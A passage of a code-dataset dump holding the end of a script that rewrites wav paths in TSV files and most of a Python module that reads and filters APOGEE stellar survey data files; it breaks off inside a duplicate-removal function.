argparse.ArgumentParser(description=\"Rebase a TSV file's wav files.\")\nparser.add_argument('filename', help='Dataset TSV file to rebase.')\nparser.add_argument('new_wav_path', help='Path to directory containing the wav files.')\nargs = parser.parse_args()\n\nif not os.path.exists(args.filename):\n raise Exception('File does not exist: %s' % args.filename)\nif not os.path.exists(args.new_wav_path):\n raise Exception('Path does not exist: %s' % args.new_wav_path)\n\nlines = []\nwith open(args.filename, 'r') as f:\n for line in f:\n fields = line.rstrip('\\n').split('\\t')\n wav_path = fields[0]\n wav_path = re.sub(r'\\\\', '/', wav_path)\n wav_path = re.sub(r'^.*/', '', wav_path)\n wav_path = os.path.join(args.new_wav_path, wav_path)\n fields[0] = wav_path\n lines.append(fields)\n\nwith open(args.filename, 'w') as f:\n for line in lines:\n f.write('\\t'.join(line) + '\\n')\n","repo_name":"daanzu/kaldi_ag_training","sub_path":"rebase_tsv.py","file_name":"rebase_tsv.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"21834825805","text":"##################################################################################\n#\n# apogee.tools.read: read various APOGEE data files\n#\n# contains:\n# \n# - allStar: read the allStar.fits file\n# - apogeeDesign: read the apogeeDesign file\n# - apogeeField: read the apogeeField file\n# - apogeeObject: read an apogeeObject file\n# - apogeePlate: read the apogeePlate file\n# - apokasc: read the APOKASC catalog\n# - mainIndx: return the index of main targets in a data set\n# - obslog: read the observation log\n# - rcsample: read the red clump sample\n#\n##################################################################################\nfrom functools import wraps\nimport os\nimport sys\nimport copy\nimport 
warnings\nimport numpy\ntry:\n import esutil\n _ESUTIL_LOADED= True\n _ESUTIL_VERSION= [int(v.split('rc')[0])\n for v in esutil.__version__.split('.')]\nexcept ImportError:\n _ESUTIL_LOADED= False\ntry:\n import fitsio\n fitsread= fitsio.read\n fitswrite=fitsio.write\n headerread=fitsio.read_header\n _FITSIO_LOADED = True\nexcept ImportError:\n import astropy.io.fits as pyfits\n fitsread= pyfits.getdata\n fitswrite=pyfits.writeto\n headerread=pyfits.getheader\n _FITSIO_LOADED = False\nimport tqdm\nfrom apogee_tools.apogee_hack.tools import path, paramIndx, download\n_ERASESTR= \" \"\ndef modelspecOnApStarWavegrid(func):\n \"\"\"Decorator to put a model spectrum onto the apStar wavelength grid\"\"\"\n @wraps(func)\n def output_wrapper(*args,**kwargs):\n out= func(*args,**kwargs)\n if kwargs.get('apStarWavegrid',True) \\\n or (kwargs.get('ext',-1) == 234 \\\n and kwargs.get('apStarWavegrid',True)):\n if len(out.shape) == 2:\n newOut= numpy.zeros((8575,out.shape[0]),dtype=out.dtype)\\\n +numpy.nan\n out= out.T\n else:\n newOut= numpy.zeros(8575,dtype=out.dtype)+numpy.nan\n if len(out) == 7214:\n newOut[322:3242]= out[:2920]\n newOut[3648:6048]= out[2920:5320]\n newOut[6412:8306]= out[5320:]\n else:\n newOut[246:3274]= out[:3028]\n newOut[3585:6080]= out[3028:5523]\n newOut[6344:8335]= out[5523:]\n if len(out.shape) == 2:\n out= newOut.T\n else:\n out= newOut\n return out\n return output_wrapper\n\ndef specOnAspcapWavegrid(func):\n \"\"\"Decorator to put an APOGEE spectrum onto the ASPCAP wavelength grid\"\"\"\n @wraps(func)\n def output_wrapper(*args,**kwargs):\n out= func(*args,**kwargs)\n if kwargs.get('header',True):\n out, hdr= out\n if kwargs.get('aspcapWavegrid',False):\n if len(out.shape) == 2:\n newOut= numpy.zeros((7214,out.shape[0]),dtype=out.dtype)\n if issubclass(out.dtype.type,numpy.float): newOut+= numpy.nan\n out= out.T\n else:\n newOut= numpy.zeros(7214,dtype=out.dtype)\n if issubclass(out.dtype.type,numpy.float): newOut+= numpy.nan\n newOut[:2920]= out[322:3242]\n newOut[2920:5320]= out[3648:6048]\n newOut[5320:]= out[6412:8306]\n if len(out.shape) == 2:\n out= newOut.T\n else:\n out= newOut\n if kwargs.get('header',True):\n return (out,hdr)\n else:\n return out\n return output_wrapper\n\ndef allStar(rmcommissioning=True,\n main=False,\n exclude_star_bad=False,\n exclude_star_warn=False,\n ak=True,\n akvers='targ',\n rmnovisits=False,\n adddist=False,\n distredux=None,\n rmdups=False,\n raw=False):\n \"\"\"\n NAME:\n allStar\n PURPOSE:\n read the allStar file\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n exclude_star_bad= (False) if True, remove stars with the STAR_BAD flag set in ASPCAPFLAG\n exclude_star_warn= (False) if True, remove stars with the STAR_WARN flag set in ASPCAPFLAG\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n rmnovisits= (False) if True, remove stars with no good visits (to go into the combined spectrum); shouldn't be necessary\n adddist= (default: False) add distances (DR10/11 Hayden distances, DR12 combined distances)\n distredux= (default: DR default) reduction on which the distances are based\n rmdups= (False) if True, remove duplicates (very slow)\n raw= (False) if True, just return the raw file, read w/ fitsio\n OUTPUT:\n allStar data\n HISTORY:\n 2013-09-06 - Written - Bovy (IAS)\n \"\"\"\n filePath= 
path.allStarPath()\n if not os.path.exists(filePath):\n download.allStar()\n #read allStar file\n data= fitsio.read(path.allStarPath())\n if raw: return data\n #Remove duplicates, cache\n if rmdups:\n dupsFilename= path.allStarPath().replace('.fits','-nodups.fits')\n if os.path.exists(dupsFilename):\n data= fitsio.read(dupsFilename)\n else:\n sys.stdout.write('\\r'+\"Removing duplicates (might take a while) and caching the duplicate-free file ...\\r\")\n sys.stdout.flush()\n data= remove_duplicates(data)\n #Cache this file for subsequent use of rmdups\n fitsio.write(dupsFilename,data,clobber=True)\n sys.stdout.write('\\r'+_ERASESTR+'\\r')\n sys.stdout.flush()\n #Some cuts\n if rmcommissioning:\n indx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['APSTAR_ID']])\n indx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['APSTAR_ID']])\n data= data[True^indx]\n if rmnovisits:\n indx= numpy.array([s.strip() != '' for s in data['VISITS']])\n data= data[indx]\n if main:\n indx= mainIndx(data)\n data= data[indx]\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n if exclude_star_bad:\n data= data[(data['ASPCAPFLAG'] & 2**23) == 0]\n if exclude_star_warn:\n data= data[(data['ASPCAPFLAG'] & 2**7) == 0]\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED:\n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning)\n #Add distances\n if adddist and _ESUTIL_LOADED:\n dist= fitsio.read(path.distPath(),1)\n h=esutil.htm.HTM()\n m1,m2,d12 = h.match(dist['RA'],dist['DEC'],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=1)\n data= data[m2]\n dist= dist[m1]\n distredux= path._redux_dr()\n if distredux.lower() == 'v302' or distredux.lower() == path._DR10REDUX:\n data= esutil.numpy_util.add_fields(data,[('DM05', float),\n ('DM16', float),\n ('DM50', float),\n ('DM84', float),\n ('DM95', float),\n ('DMPEAK', float),\n ('DMAVG', float),\n ('SIG_DM', float),\n ('DIST_SOL', float),\n ('SIG_DISTSOL', float)])\n data['DM05']= dist['DM05']\n data['DM16']= dist['DM16']\n data['DM50']= dist['DM50']\n data['DM84']= dist['DM84']\n data['DM95']= dist['DM95']\n data['DMPEAK']= dist['DMPEAK']\n data['DMAVG']= dist['DMAVG']\n data['SIG_DM']= dist['SIG_DM']\n data['DIST_SOL']= dist['DIST_SOL']/1000.\n data['SIG_DISTSOL']= dist['SIG_DISTSOL']/1000.\n elif distredux.lower() == path._DR11REDUX:\n data= esutil.numpy_util.add_fields(data,[('DISO', float),\n ('DMASS', float),\n ('DISO_GAL', float),\n ('DMASS_GAL', float)])\n data['DISO']= dist['DISO'][:,1]\n data['DMASS']= dist['DMASS'][:,1]\n data['DISO_GAL']= dist['DISO_GAL'][:,1]\n data['DMASS_GAL']= dist['DMASS_GAL'][:,1]\n elif distredux.lower() == path._DR12REDUX:\n data= esutil.numpy_util.add_fields(data,[('HIP_PLX', float),\n ('HIP_E_PLX', float),\n ('RC_DIST', float),\n ('APOKASC_DIST_DIRECT', float),\n ('BPG_DIST1_MEAN', float),\n ('HAYDEN_DIST_PEAK', float),\n ('SCHULTHEIS_DIST', float)])\n data['HIP_PLX']= dist['HIP_PLX']\n data['HIP_E_PLX']= dist['HIP_E_PLX']\n data['RC_DIST']= 
dist['RC_dist_pc']\n data['APOKASC_DIST_DIRECT']= dist['APOKASC_dist_direct_pc']/1000.\n data['BPG_DIST1_MEAN']= dist['BPG_dist1_mean']\n data['HAYDEN_DIST_PEAK']= 10.**(dist['HAYDEN_distmod_PEAK']/5.-2.)\n data['SCHULTHEIS_DIST']= dist['SCHULTHEIS_dist']\n elif adddist:\n warnings.warn(\"Distances not added because matching requires the uninstalled esutil module\",RuntimeWarning)\n if _ESUTIL_LOADED and (path._APOGEE_REDUX.lower() == 'current' \\\n or 'l30' in path._APOGEE_REDUX.lower() \\\n or int(path._APOGEE_REDUX[1:]) > 600):\n data= esutil.numpy_util.add_fields(data,[('METALS', float),\n ('ALPHAFE', float)])\n data['METALS']= data['PARAM'][:,paramIndx('metals')]\n data['ALPHAFE']= data['PARAM'][:,paramIndx('alpha')]\n return data\n \ndef allVisit(rmcommissioning=True,\n main=False,\n ak=True,\n akvers='targ',\n plateInt=False,\n plateS4=False,\n raw=False):\n \"\"\"\n NAME:\n allVisit\n PURPOSE:\n read the allVisit file\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n plateInt= (False) if True, cast plate as an integer and give special plates -1\n plateS4= (False) if True, cast plate as four character string\n raw= (False) if True, just return the raw file, read w/ fitsio\n OUTPUT:\n allVisit data\n HISTORY:\n 2013-11-07 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.allVisitPath()\n if not os.path.exists(filePath):\n download.allVisit()\n #read allVisit file\n data= fitsio.read(path.allVisitPath())\n if raw: return data\n #Some cuts\n if rmcommissioning:\n indx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['VISIT_ID']])\n indx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['VISIT_ID']])\n data= data[True^indx]\n if main:\n indx= mainIndx(data)\n data= data[indx]\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n if plateInt or plateS4:\n #If plate is a string, cast it as an integer\n if isinstance(data['PLATE'][0],str):\n #First cast the special plates as -1\n plateDtype= data['PLATE'].dtype\n data['PLATE'][data['PLATE'] == 'calibration'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'hip'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'misc'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'moving_groups'.ljust(int(str(plateDtype)[2:]))]= -1\n data['PLATE'][data['PLATE'] == 'rrlyr'.ljust(int(str(plateDtype)[2:]))]= '-1'\n #Now change the dtype to make plate an int\n dt= data.dtype\n dt= dt.descr\n plateDtypeIndx= dt.index(('PLATE', '|S13'))\n if plateInt:\n dt[plateDtypeIndx]= (dt[plateDtypeIndx][0],'int')\n elif plateS4:\n dt[plateDtypeIndx]= (dt[plateDtypeIndx][0],'|S4')\n dt= numpy.dtype(dt)\n data= data.astype(dt)\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED:\n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n 
warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning) \n return data\n \ndef apokasc(rmcommissioning=True,\n main=False):\n \"\"\"\n NAME:\n apokasc\n PURPOSE:\n read the APOKASC data\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n OUTPUT:\n APOKASC data\n HISTORY:\n 2013-10-01 - Written - Bovy (IAS)\n \"\"\"\n if not _ESUTIL_LOADED:\n raise ImportError(\"apogee.tools.read.apokasc function requires the esutil module for catalog matching\")\n #read allStar file\n data= allStar(rmcommissioning=rmcommissioning,main=main,adddist=False,\n rmdups=False)\n #read the APOKASC file\n kascdata= fitsio.read(path.apokascPath())\n #Match these two\n h=esutil.htm.HTM()\n m1,m2,d12 = h.match(kascdata['RA'],kascdata['DEC'],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=1)\n data= data[m2]\n kascdata= kascdata[m1]\n kascdata= esutil.numpy_util.add_fields(kascdata,[('J0', float),\n ('H0', float),\n ('K0', float),\n ('APOGEE_TARGET1','>i4'),\n ('APOGEE_TARGET2','>i4'),\n ('APOGEE_ID', 'S18'),\n ('LOGG', float),\n ('TEFF', float),\n ('METALS', float),\n ('ALPHAFE', float),\n ('FNFE', float),\n ('FCFE', float)])\n kascdata['J0']= data['J0']\n kascdata['H0']= data['H0']\n kascdata['K0']= data['K0']\n kascdata['APOGEE_ID']= data['APOGEE_ID']\n kascdata['APOGEE_TARGET1']= data['APOGEE_TARGET1']\n kascdata['APOGEE_TARGET2']= data['APOGEE_TARGET2']\n kascdata['LOGG']= data['LOGG']\n kascdata['TEFF']= data['TEFF']\n kascdata['METALS']= data['METALS']\n kascdata['ALPHAFE']= data['ALPHAFE']\n kascdata['FNFE']= data['FPARAM'][:,5]\n kascdata['FCFE']= data['FPARAM'][:,4]\n return kascdata\n\ndef rcsample(main=False,dr=None):\n \"\"\"\n NAME:\n rcsample\n PURPOSE:\n read the rcsample file\n INPUT:\n main= (default: False) if True, only select stars in the main survey\n dr= data reduction to load the catalog for (automatically set based on APOGEE_REDUX if not given explicitly)\n OUTPUT:\n rcsample data\n HISTORY:\n 2013-10-08 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.rcsamplePath(dr=dr)\n if not os.path.exists(filePath):\n download.rcsample(dr=dr)\n #read rcsample file\n data= fitsio.read(path.rcsamplePath(dr=dr))\n #Some cuts\n if main:\n indx= mainIndx(data)\n data= data[indx]\n return data\n \ndef obslog(year=None):\n \"\"\"\n NAME:\n obslog\n PURPOSE:\n read the observation summary up to a certain year\n INPUT:\n year= read up to this year (None)\n OUTPUT:\n observation log\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n obslogfilename= path.obslogPath(year=year)\n if not os.path.exists(obslogfilename):\n download.obslog(year=year)\n genfromtxtKwargs= {'delimiter':'|',\n 'dtype':[('Fieldname','S14'),\n ('LocID','int'),\n ('ra','float'),\n ('dec','float'),\n ('Plate','int'),\n ('A_ver','S14'),\n ('DrilledHA','float'),\n ('HDB','int'),\n ('NObs_Plan','int'),\n ('NObs_Done','int'),\n ('NObs_Ver_Plan','int'),\n ('NObs_Ver_Done','int'),\n ('Total_SN','float'),\n ('Red_SN','float'),\n ('ManPriority','int'),\n ('Priority','float'),\n ('Time','float'),\n ('Shared','int'),\n ('Stars','int'),\n ('At_APO','int'),\n ('Reduction','int'),\n ('ObsHistory','S50'),\n ('UNKNOWN','S50'),\n ('UNKNOWN1','int'),\n ('UNKNOWN2','int'),\n ('ReductionHistory','S50')],\n 'skip_footer':1}\n if int(numpy.__version__.split('.')[0]) < 1 \\\n or int(numpy.__version__.split('.')[1]) < 10:\n genfromtxtKwargs['skiprows']= 2\n else:\n genfromtxtKwargs['skip_header']= 2\n 
obslogtxt= numpy.genfromtxt(obslogfilename,**genfromtxtKwargs)\n return obslogtxt\n\ndef apogeePlate(dr=None):\n \"\"\"\n NAME:\n apogeePlate\n PURPOSE:\n read the apogeePlate file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeePlate file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeePlatePath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeePlate(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeDesign(dr=None):\n \"\"\"\n NAME:\n apogeeDesign\n PURPOSE:\n read the apogeeDesign file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeeDesign file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeDesignPath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeeDesign(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeField(dr=None):\n \"\"\"\n NAME:\n apogeeField\n PURPOSE:\n read the apogeeField file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeeField file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeFieldPath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeeField(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeObject(field_name,dr=None,\n ak=True,\n akvers='targ'):\n \"\"\"\n NAME:\n apogeePlate\n PURPOSE:\n read the apogeePlate file\n INPUT:\n field_name - name of the field\n dr= return the file corresponding to this data release\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n OUTPUT:\n apogeeObject file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeObjectPath(field_name,dr=dr)\n if not os.path.exists(filePath):\n download.apogeeObject(field_name,dr=dr)\n data= fitsio.read(filePath)\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED: \n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning) \n return data\n\n@specOnAspcapWavegrid\ndef aspcapStar(loc_id,apogee_id,ext=1,dr=None,header=True,\n aspcapWavegrid=False):\n \"\"\"\n NAME:\n aspcapStar\n PURPOSE:\n Read an aspcapStar file for a given star\n INPUT:\n loc_id - location ID (field for 1m targets)\n apogee_id - APOGEE ID of the star\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n aspcapWavegrid= (False) if True, output the spectrum on the ASPCAP \n wavelength grid\n OUTPUT:\n aspcapStar file or (aspcapStar file, header)\n HISTORY:\n 2014-11-25 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.aspcapStarPath(loc_id,apogee_id,dr=dr)\n if not os.path.exists(filePath):\n download.aspcapStar(loc_id,apogee_id,dr=dr)\n data= fitsio.read(filePath,ext,header=header)\n return data\n\n@specOnAspcapWavegrid\ndef 
apStar(loc_id,apogee_id,ext=1,dr=None,header=True,aspcapWavegrid=False):\n \"\"\"\n NAME:\n apStar\n PURPOSE:\n Read an apStar file for a given star\n INPUT:\n loc_id - location ID (field for 1m targets)\n apogee_id - APOGEE ID of the star\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n aspcapWavegrid= (False) if True, output the spectrum on the ASPCAP \n wavelength grid\n OUTPUT:\n apStar file or (apStar file, header)\n HISTORY:\n 2015-01-13 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apStarPath(loc_id,apogee_id,dr=dr)\n if not os.path.exists(filePath):\n download.apStar(loc_id,apogee_id,dr=dr)\n data= fitsio.read(filePath,ext,header=header)\n return data\n\ndef apVisit(loc_id, mjd, fiberid, ext=1, dr=None, header=True):\n \"\"\"\n NAME: apVisit\n PURPOSE: Read a single apVisit file for a given location, MJD, and fiber\n INPUT:\n loc_id = 4-digit location ID (field for 1m targets)\n mjd = 5-digit MJD\n fiberid = 3-digit fiber ID\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n OUTPUT: \n header=False:\n 1D array with apVisit fluxes (ext=1)\n 1D array with apVisit flux errors (ext=2)\n corresponding wavelength grid (ext=4) **WARNING** SORTED FROM HIGH TO LOW WAVELENGTH !!!\n go here to learn about other extensions:\n https://data.sdss.org/datamodel/files/APOGEE_REDUX/APRED_VERS/TELESCOPE/PLATE_ID/MJD5/apVisit.html\n header=True:\n (3D array with three portions of whichever extension you specified, header)\n HISTORY: 2016-11 - Meredith Rawls\n TODO: automatically find all apVisit files for a given apogee ID and download them\n \"\"\"\n filePath = path.apVisitPath(loc_id, mjd, fiberid, dr=dr)\n if not os.path.exists(filePath):\n download.apVisit(loc_id, mjd, fiberid, dr=dr)\n data = fitsio.read(filePath, ext, header=header)\n if header == False: # stitch three chips together in increasing wavelength order\n data = data.flatten()\n data = numpy.flipud(data)\n return data\n\n@modelspecOnApStarWavegrid\ndef modelSpec(lib='GK',teff=4500,logg=2.5,metals=0.,\n cfe=0.,nfe=0.,afe=0.,vmicro=2.,\n dr=None,header=True,ext=234,apStarWavegrid=None,**kwargs):\n \"\"\"\n NAME:\n modelSpec\n PURPOSE:\n Read a model spectrum file\n INPUT:\n lib= ('GK') spectral library\n teff= (4500) grid-point Teff\n logg= (2.5) grid-point logg\n metals= (0.) grid-point metallicity\n cfe= (0.) grid-point carbon-enhancement\n nfe= (0.) grid-point nitrogen-enhancement\n afe= (0.) grid-point alpha-enhancement\n vmicro= (2.) 
grid-point microturbulence\n       dr= return the path corresponding to this data release\n       ext= (234) extension to load (if ext=234, the blue, green, and red spectra will be combined [onto the aspcapStar wavelength grid by default, just concatenated if apStarWavegrid=False), with NaN where there is no model)\n       apStarWavegrid= (True) if False and ext=234, don't put the spectrum on the apStar wavelength grid, but just concatenate the blue, green, and red detector\n       header= (True) if True, also return the header (not for ext=234)\n       dr= return the path corresponding to this data release (general default)\n       +download kwargs\n    OUTPUT:\n       model spectrum or (model spectrum file, header)\n    HISTORY:\n       2015-01-13 - Written - Bovy (IAS)\n    \"\"\"\n    filePath= path.modelSpecPath(lib=lib,teff=teff,logg=logg,metals=metals,\n                                 cfe=cfe,nfe=nfe,afe=afe,vmicro=vmicro,dr=dr)\n    if not os.path.exists(filePath):\n        download.modelSpec(lib=lib,teff=teff,logg=logg,metals=metals,\n                           cfe=cfe,nfe=nfe,afe=afe,vmicro=vmicro,dr=dr,\n                           **kwargs)\n    # Need to use astropy's fits reader, bc the file has issues\n    import astropy.io.fits as apyfits\n    from astropy.utils.exceptions import AstropyUserWarning\n    import warnings\n    warnings.filterwarnings('ignore',category=AstropyUserWarning)\n    hdulist= apyfits.open(filePath)\n    # Find index of nearest grid point in Teff, logg, and metals\n    if dr is None: dr= path._default_dr()\n    if dr == '12':\n        logggrid= numpy.linspace(0.,5.,11)\n        metalsgrid= numpy.linspace(-2.5,0.5,7)\n        if lib.lower() == 'gk':\n            teffgrid= numpy.linspace(3500.,6000.,11)\n            teffIndx= numpy.argmin(numpy.fabs(teff-teffgrid))\n        elif lib.lower() == 'f':\n            teffgrid= numpy.linspace(5500.,8000.,11)\n            teffIndx= numpy.argmin(numpy.fabs(teff-teffgrid))\n        loggIndx= numpy.argmin(numpy.fabs(logg-logggrid))\n        metalsIndx= numpy.argmin(numpy.fabs(metals-metalsgrid))\n    if header and not ext == 234:\n        return (hdulist[ext].data[metalsIndx,loggIndx,teffIndx],\n                hdulist[ext].header)\n    elif not ext == 234:\n        return hdulist[ext].data[metalsIndx,loggIndx,teffIndx]\n    else: #ext == 234, combine 2,3,4\n        out= numpy.zeros(7214)\n        out[:2920]= hdulist[2].data[metalsIndx,loggIndx,teffIndx]\n        out[2920:5320]= hdulist[3].data[metalsIndx,loggIndx,teffIndx]\n        out[5320:]= hdulist[4].data[metalsIndx,loggIndx,teffIndx]\n        return out\n\ndef apWave(chip,ext=2,dr='13'):\n    \"\"\"\n    NAME:\n       apWave\n    PURPOSE:\n       open an apWave file\n    INPUT:\n       chip - chip 'a', 'b', or 'c'\n       ext= (2) extension to read\n       dr= return the path corresponding to this data release \n    OUTPUT:\n       contents of HDU ext\n    HISTORY:\n       2015-02-27 - Written - Bovy (IAS)\n    \"\"\"\n    filePath= path.apWavePath(chip,dr=dr)\n    if not os.path.exists(filePath):\n        download.apWave(chip,dr=dr)\n    data= fitsio.read(filePath,ext)\n    return data\n\ndef apLSF(chip,ext=0,dr=None):\n    \"\"\"\n    NAME:\n       apLSF\n    PURPOSE:\n       open an apLSF file\n    INPUT:\n       chip - chip 'a', 'b', or 'c'\n       ext= (0) extension to read\n       dr= return the path corresponding to this data release\n    OUTPUT:\n       contents of HDU ext\n    HISTORY:\n       2015-03-12 - Written - Bovy (IAS)\n    \"\"\"\n    \n    filePath= path.apLSFPath(chip,dr=dr)\n    if not os.path.exists(filePath):\n        download.apLSF(chip,dr=dr)\n    data= fitsio.read(filePath,ext)\n\n    return data\n\ndef mainIndx(data):\n    \"\"\"\n    NAME:\n       mainIndx\n    PURPOSE:\n       apply 'main' flag cuts and return the index of 'main' targets\n    INPUT:\n       data- data sample (with APOGEE_TARGET1 and APOGEE_TARGET2 flags)\n    OUTPUT:\n       index of 'main' targets in data\n    HISTORY:\n       2013-11-19 - Written - Bovy (IAS)\n    \"\"\"\n    indx= (((data['APOGEE_TARGET1'] & 
2**11) != 0)+((data['APOGEE_TARGET1'] & 2**12) != 0)+((data['APOGEE_TARGET1'] & 2**13) != 0))\\\n        *((data['APOGEE_TARGET1'] & 2**7) == 0)\\\n        *((data['APOGEE_TARGET1'] & 2**8) == 0)\\\n        *((data['APOGEE_TARGET2'] & 2**9) == 0)\n    #*((data['APOGEE_TARGET1'] & 2**17) == 0)\\\n    return indx\n\ndef remove_duplicates(data):\n    \"\"\"\n    NAME:\n       remove_duplicates\n    PURPOSE:\n       remove duplicates from an array\n    INPUT:\n       data - array\n    OUTPUT:\n       array w/ duplicates removed\n    HISTORY:\n       2014-06-23 - Written - Bovy (IAS)\n    \"\"\"\n    if not _ESUTIL_LOADED:\n        raise ImportError(\"apogee.tools.read.remove_duplicates function requires the esutil module for catalog matching\")\n    tdata= copy.copy(data)\n    #Match the data against itself\n    if _ESUTIL_VERSION[1] >= 5 and _ESUTIL_VERSION[2] >= 3:\n        h= esutil.htm.Matcher(10,data['RA'],data['DEC'])\n        m1,m2,d12 = h.match(data['RA'],data['DEC'],\n                            2./3600.,maxmatch=0) #all matches\n    else:\n        h=esutil.htm.HTM()\n        htmrev2,minid,maxid = h.match_prepare(data['RA'],data['DEC'])\n        m1,m2,d12 = h.match(data['RA'],data['DEC'],\n                            data['RA'],data['DEC'],\n                            2./3600.,maxmatch=0, #all matches\n                            htmrev2=htmrev2,minid=minid,maxid=maxid)\n    sindx= numpy.argsort(m1)\n    sm1= m1[sindx]\n    dup= sm1[1:] == sm1[:-1]\n    for d in tqdm.tqdm(sm1[:-1][dup]):\n        #Find the matches for just this duplicate\n        if _ESUTIL_VERSION[1] >= 5 and _ESUTIL_VERSION[2] >= 3:\n            nm1,nm2,nd12= h.match(data['RA'][d],data['DEC'][d],\n                                  2./3600.,maxmatch=0) #all matches\n        else:\n            nm1,nm2,nd12= h.match(data['RA'][d],data['DEC'][d],\n                                  data['RA'],data['DEC'],\n                                  2./3600.,maxmatch=0, #all matches\n                                  htmrev2=htmrev2,minid=minid,maxid=maxid)\n        #If some matches are commissioning data or have bad ak, rm from consideration\n        comindx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['APSTAR_ID'][nm2]])\n        comindx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['APSTAR_ID'][nm2]])\n        goodak= (True^numpy.isnan(data['AK_TARG'][nm2]))\\\n            *(data['AK_TARG'][nm2] > -50.)\n        hisnr= numpy.argmax(data['SNR'][nm2]*(True^comindx)*goodak) #effect. 
